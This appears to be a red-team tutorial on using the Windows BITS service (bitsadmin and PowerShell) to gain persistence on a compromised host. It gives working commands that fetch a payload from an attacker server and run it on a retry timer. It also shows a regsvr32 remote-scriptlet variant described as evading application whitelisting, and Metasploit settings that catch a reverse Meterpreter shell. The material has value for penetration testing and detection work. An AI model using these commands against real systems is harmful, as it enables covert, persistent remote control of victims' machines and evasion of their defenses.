Windows operating systems contain various utilities which can be used by system administrators to perform various tasks. One of these utilities is the Background Intelligent Transfer Service (BITS) which can facilitate file transfer capability to web servers (HTTP ) and share folders (SMB). Microsoft provides a binary called “bitsadmin” and PowerShell cmdlets for creating and managing transfer of files.

From an offensive point of view this functionality can be abused in order to download payloads (executable files, PowerShell scripts, scriptlets etc.) on the compromised host and execute these files at a given time in order to create persistence in a red team operation. However, interacting with the “bitsadmin” requires Administrator level privileges. Executing the following command will download a malicious payload from a remote location to a local directory.

bitsadmin /transfer backdoor /download /priority high http://10.0.2.21/pentestlab.exe C:\tmp\pentestlab.exe

There is also a PowerShell cmdlet which can perform the same task.

Start-BitsTransfer -Source "http://10.0.2.21/pentestlab.exe" -Destination "C:\tmp\pentestlab.exe"

Once the file has been dropped into disk the persistence can be achieved by executing the following commands from the “bitsadmin” utility. Usage is pretty straightforward:

1. the create parameter requires a name for the job
2. the addfile requires the remote location of the file and the local path
3. the SetNotifyCmdLine the command that will executed
4. the SetMinRetryDelay defines the time for the callback (in seconds)
5. The resume parameter will run the bits job.

bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.0.2.21/pentestlab.exe"  "C:\tmp\pentestlab.exe"
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\pentestlab.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor

When the job run on the system the payload will executed and a Meterpreter session will open or the communication will received back to the Command and Control (depending on which C2 is used in the occasion).

The parameter SetNotifyCmdLine can also be used to execute a scriptlet from a remote location via the regsvr32 utility. The benefit of this method is that it doesn’t touches the disk and can evade application whitelisting products.

bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.0.2.21:8080/FHXSd9.sct scrobj.dll"
bitsadmin /resume backdoor

Metasploit framework can be used to capture the payload through the web delivery module.

use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.2.21
exploit

References

• https://attack.mitre.org/techniques/T1197/
• https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal
• http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html